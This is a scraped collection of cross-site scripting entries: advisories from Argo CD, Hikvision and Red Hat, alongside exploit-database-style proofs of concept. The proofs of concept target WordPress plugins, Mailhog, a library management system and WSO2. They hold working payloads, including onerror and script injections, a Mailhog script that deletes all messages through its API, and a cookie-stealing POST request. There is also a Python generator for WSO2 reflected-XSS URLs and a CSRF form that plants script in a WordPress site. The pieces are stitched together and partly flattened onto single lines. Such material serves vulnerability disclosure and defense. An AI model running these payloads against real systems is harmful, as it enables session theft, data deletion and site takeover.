Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a `javascript:` link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin). The script would be capable of doing anything which is possible in the UI or via the API, such as creating, modifying, and deleting Kubernetes resources. A patch for this vulnerability has been released in the following Argo CD versions: v2.4.1, v2.3.5, v2.2.10 and v2.1.16. There are no completely-safe workarounds besides upgrading.

You can add additional external links to ArgoCD dashboard. For example links monitoring pages or documentation instead of just ingress hosts or other apps.

ArgoCD generates a clickable links to external pages for a resource based on per resource annotation.

Example:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-svc
  annotations:
    link.argocd.argoproj.io/external-link: http://my-grafana.com/pre-generated-link

The external link icon will be visible for respective resource on ArgoCD application details page.

CVE-2022-31035: Add external URL - Argo CD

The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerability. Due to the insufficient input validation, attacker can exploit the vulnerability to XSS attack by sending messages with malicious commands to the affected device.

**SN No.** HSRC-202206-01

**Edit:** Hikvision Security Response Center (HSRC)

**Initial Release Date:** 2022-06-23

**Summary**

The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerabilities:

1) Due to the insufficient input validation, attacker can exploit the vulnerability to execute restricted commands by sending messages with malicious commands to the affected device. 

2) Due to the insufficient input validation, attacker can exploit the vulnerability to XSS attack by sending messages with malicious commands to the affected device.

**CVE ID**

CVE-2022-28171

CVE-2022-28172

**Scoring**

CVSS v3 is adopted in this vulnerability scoring. 

(http://www.first.org/cvss/specification-document)

CVE-2022-28171

Base score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Temporal score: 6.7 (/E:P/RL:O/RC:C)

CVE-2022-28172

Base score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)

Temporal score: 5.9 (E:P/RL:O/RC:C)

**Affected Versions and Fixes**

**Product Name**

**Affected Versions**

DS-A71024/48/72R

Versions below V2.3.8-6 (including V2.3.8-6)

DS-A80624S

DS-A81016S

DS-A72024/72R

DS-A80316S

DS-A82024D

DS-A71024/48R-CVS

Versions below V1.1.4 (including V1.1.4)

DS-A72024/48R-CVS

**Precondition**

The attacker has network access to the device.

**Attack Step**

Send a specially crafted malicious message.

**Obtaining Fixed Versions**

Users can download patches/updates on the Hikvision official website (Click here) to mitigate these vulnerabilities. 

**Source of vulnerability information:**

This vulnerability is reported to HSRC by independent security researcher Thurein Soe.

**Contact Us**

To report any security issues or vulnerabilities in Hikvision products and solutions, please contact Hikvision Security Response Center at hsrc@hikvision.com.

Hikvision would like to thank all the security researchers who help identify and mitigate potential vulnerabilities in our products to ensure that our solutions protect people, places, and assets while user data is safeguarded. 

**Check out the Partner Letter to get more information >>**

CVE-2022-28172: Security Vulnerability in Some Hikvision Hybrid SAN Products

WordPress Simple Page Transition plugin version 1.4.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin ‘Simple Page Transition’  - Stored CrossSite Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/# Version: 1.4.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com*#Vulnerable code*:```<label for="simple_page_transition_ignored"><?php _e( 'Ignored DownloadLinks', 'spt' ); ?></label><br /><input type="text" id="simple_page_transition_ignored"name="simple_page_transition_ignored" value="*<?php print$simple_page_transition_ignored; ?>*" /><br />```*#POC:*1- Install the plugin ‘simple page transition’ & activate it.2- Navigate towards the “ignored download links”3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`*#POC image:*https://imgur.com/yzaTkhi

WordPress Simple Page Transition 1.4.1 Cross Site Scripting

Mailhog version 1.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)# Google Dork: https://www.shodan.io/search?query=mailhog ( > 3500)# Date: 06.18.2022# Exploit Author: Vulnz# Vendor Homepage: https://github.com/mailhog/MailHog# Software Link: https://github.com/mailhog/MailHog# Version: 1.0.1# Tested on: Windows,Linux,Docker# CVE : N/AExplanation:Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including  email deletion, sending, reading or any other call.Steps to reproduce:   1.   Create malicious attachment with payloads stated below   2.   Attach malicious file to email with payload (XSS)   3.   Send email   4.   Wait for victim to open email   5.   Receive data, get control of victim browser using Beef framework, or manipulate with API dataProof of Concept:<script>var XMLHttpFactories = [function () {    return new XMLHttpRequest()},function () {    return new ActiveXObject("Msxml2.XMLHTTP")},function () {    return new ActiveXObject("Msxml3.XMLHTTP")},function () {    return new ActiveXObject("Microsoft.XMLHTTP")}];function createXMLHTTPObject() {    var xmlhttp = false;    for (var i=0;i<XMLHttpFactories.length;i++) {        try {            xmlhttp = XMLHttpFactories[i]();        }        catch (e) {            continue;        }        break;    }    return xmlhttp;}var xhr = createXMLHTTPObject();xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true);xhr.onreadystatechange = function(){    if (xhr.readyState == 4)        alert("Request completed, with the following status code: " +xhr.status);}xhr.send("");</script>

Mailhog 1.0.1 Cross Site Scripting

WordPress W-DALIL plugin version 2.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin W-DALIL  - Stored Cross Site Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/w-dalil/# Version: 2.0# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Vulnerable Code:```<input class="dalil_input" name="dalil-address" type="text"placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"value="<?php echo $dalil_information['dalil-address']; ?>"  />```#Steps To Reproduce :1 - First Install the plugin  "*w-dalil*" and activate it.2 - Go to Dalil —> Add New Dalil item3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=xonerror=alert(1)>*" and hit enter.#Poc Image :https://imgur.com/JPG97oh

WordPress W-DALIL 2.0 Cross Site Scripting

Red Hat Security Advisory 2022-5187-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2022:5187-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5187  
Issue date:        2022-06-24  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-31016   
                   CVE-2022-31034 CVE-2022-31035 CVE-2022-31036   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.3 on OpenShift  
4.6.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift GitOps is a declarative way to implement continuous  
deployment for cloud native applications.

Security Fix(es):

* argocd: vulnerable to a variety of attacks when an SSO login is initiated  
from the Argo CD CLI or the UI. (CVE-2022-31034)

* argocd: cross-site scripting (XSS) allow a malicious user to inject a  
javascript link in the UI (CVE-2022-31035)

* argocd: vulnerable to an uncontrolled memory consumption bug  
(CVE-2022-31016)

* argocd: vulnerable to a symlink following bug allowing a malicious user  
with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI  
2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.  
2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug  
2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-31016  
https://access.redhat.com/security/cve/CVE-2022-31034  
https://access.redhat.com/security/cve/CVE-2022-31035  
https://access.redhat.com/security/cve/CVE-2022-31036  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrZYStzjgjWX9erEAQhr7BAAgkwBXxlhZvhp+y0mChTHSRpCDWIFv5CK  
CQc1Otk7kyhpeDftCLr6hNY/jcWRb3GtyuYd+vAVAkATAyG5ZueNND+k2V+k1QHW  
+b0ZdyjkRkAmH4qsCayCa1Y0T8smn7BKq83NbQY4staEBz7hHF5dj8UZ2mvQ5RPl  
g2mnu6p2ZPfmKYQ0hLjQgKf0L4y1U5OKIWOoqJlcjIYbb6AjEMIsHe2zSga/t4Ko  
u44FZO10E665conWWlqI0rMr+k8joiQap1//FxMad9pJv0Cs9Y/WNThsryHbNsiF  
cZKUDO2DDQClegtRqTeVG/s6pg1E7IlvxpbzI8288ZSOB/kb5LioTJ8Rb2RIbnd/  
TtYBkDPDds5HnaNHVIpniyBtz8e2rd/knfkEfDh9eM5qIBOdsM5DBbRUN3ommYaV  
HgNxO+UGHa4QaFX1QPz65sjqe8ntjPq8jZWR9KF2gSmPoU1YkbVpQNfV37emCSrS  
WG2Y3LdWsMgcPGj7Dq6dV5tIcowiygHHjo1NF3A4XFFB13zm/RLQEvVwL3k1t07G  
QbWVqZ6DYIyBswIh9L408M5ydw8JVmzxCuwBqLv1K+mprTUvvFo63IMJYWOxPLvj  
x9i+AQ9e5NQsDFSXOUTVyVnZuaAjBPoC8bk2xvH/OuS0Uo5M2bBIFX6h5IF6PVlT  
+y9QAGpBsqc=  
=WK5w  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5187-01

Library Management System with QR Code version 1.0 suffers from a persistent cross site scripting vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 StoredCross-Site Scripting#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Cross%20Site%20Scripting(Stored)/POC.md#### Description：#### Library Management System with QR code Attendance is vulnerable toStored cross-site scripting on the profile edit page. The "Name" parameterin 'http://localhost/LMS/admin/edit_admin_details.php' is vulnerable.#### Impact: An attacker could steal cookies with a crafted URL sent to the victims.### POC```POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1Host: localhostContent-Length: 115Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/admin/edit_admin_details.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: closeName=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%40gmail.com&MobNo=0&Password=admin&submit=```

Library Management System With QR Code 1.0 Cross Site Scripting

WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

    # Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)# Date: 21 Apr 2022# Exploit Author: cxosmo# Vendor Homepage: https://wso2.com# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;     # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;    # API Microgateway 2.2.0;    # Data Analytics Server 3.2.0;    # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;    # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;    # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;    # Identity Server Analytics 5.5.0 and 5.6.0;    # WSO2 Micro Integrator 1.0.0.# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)# CVE: CVE-2022-29548import argparseimport loggingimport urllib.parse# Global variablesVULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="DEFAULT_PAYLOAD = "alert(document.domain)"# Logging configlogging.basicConfig(level=logging.INFO, format="")log = logging.getLogger()def generate_payload(url, custom_payload=False):    log.info(f"Generating payload for {url}...")    if custom_payload:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")    else:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")def clean_url_input(url):    if url.count("/") > 2:        return f"{url.split('/')[0]}//{url.split('/')[2]}"    else:        return urldef check_payload(payload):    encoded_characters = ['"', '<', '>']    if any(character in payload for character in encoded_characters):        log.info(f"Unsupported character(s) (\", <, >) found in payload.")        return False    else:        return urllib.parse.quote(payload)if __name__ == "__main__":    # Parse command line    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)    required_arguments = parser.add_argument_group('required arguments')    required_arguments.add_argument("-t", "--target",                        help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",                        required="True", action="store")    parser.add_argument("-p", "--payload",                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",                        action="store", default=False)    args = parser.parse_args()    # Clean user target input    args.target = clean_url_input(args.target.lower())    # Check for unsupported characters in custom payload; URL-encode as required    if args.payload:        args.payload = check_payload(args.payload)        if args.payload:            generate_payload(args.target, args.payload)    else:        generate_payload(args.target)

WSO2 Management Console Cross Site Scripting

Red Hat Security Advisory 2022-5192-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2022:5192-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5192  
Issue date:        2022-06-24  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-31016   
                   CVE-2022-31034 CVE-2022-31035 CVE-2022-31036   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.3.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift GitOps is a declarative way to implement continuous  
deployment for cloud native applications.

Security Fix(es):

* argocd: vulnerable to a variety of attacks when an SSO login is initiated  
from the Argo CD CLI or the UI. (CVE-2022-31034)

* argocd: cross-site scripting (XSS) allow a malicious user to inject a  
javascript link in the UI (CVE-2022-31035)

* argocd: vulnerable to an uncontrolled memory consumption bug  
(CVE-2022-31016)

* argocd: vulnerable to a symlink following bug allowing a malicious user  
with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI  
2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.  
2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug  
2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-31016  
https://access.redhat.com/security/cve/CVE-2022-31034  
https://access.redhat.com/security/cve/CVE-2022-31035  
https://access.redhat.com/security/cve/CVE-2022-31036  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrZYPdzjgjWX9erEAQjrKg//fhNsc37/PGObQ+ILtKev6tbnelvEZXen  
q4eqQw+qbj2BXJyBVudmB1yrnMYc5ZcQViuQwAbhFafexFR5b6UjGr+g8x+5lSIq  
o/RBisD/Ob7/uavZua+ZzRutE3ER/f5YVK86AvK5cbk8hAlTtL0UN7RlFictYW+0  
hld0OyTXKUioPgwjZagQX7fhcyAKJsMIpnG8jZfygSsDje0fIDAHsyPfPGVWibUM  
1mRE9x618hFD+Dml70BpXE5X2CTnyfIQbWtPmR3KX5muhnh64zpNk3jGHhtjIqI9  
zT7CLR8o5Dvr6/n+HLT4WjPmfLiX2Hbo7fe4e4y2xdfkjDXPw4HoLr9ZF30FplG1  
eMhXCBWqyGYcYWh77lZlFLLQaz/ZE5pf7DxqwGzWBUUVrBFEJ+bIQKjB/y6WavnC  
rxCboZoqRifcvyKM1mDUcBK9YO14j9GXwb2Xu1IK7Z92RXZzZxIyRmJNRZDMzGF9  
uWxqBXbuSF/eRQFrRhJn8aeVzzxPMiqe/nRa1JsXJdMD8gyefVPloAVeRNx/0EbO  
4CpG2IGmQevfFx+E1ADM0X72TE0Bm1nzTSEd6D4i2DiA/NyYo2Ape3In9lHg8qYV  
XtcXBwBe14OJca+iAYTr3hMF/xzrCtfGd/lyf4ikQUMDWaNi2ixzA28MejDFJ0yl  
8b5s087AQwk=  
=FmJg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5192-01

WordPress Plugin UK Cookie is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also possible. WordPress Plugin UK Cookie version 1.1 is vulnerable; other versions may also be affected.

There is CSRF security vulnerability in uk-cookie plugin version 1.1 and using it attacker can insert XSS to front page of WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

    <html>
    <body>
    <form action="https://example.com/wp-admin/options.php" method="POST">
    <input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
    <input type="hidden" name="action" value="update" />
    <input type="hidden" name="&#95;wpnonce" value="e909307b13" />
    <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
    <input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
    <input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>

Tag

#xss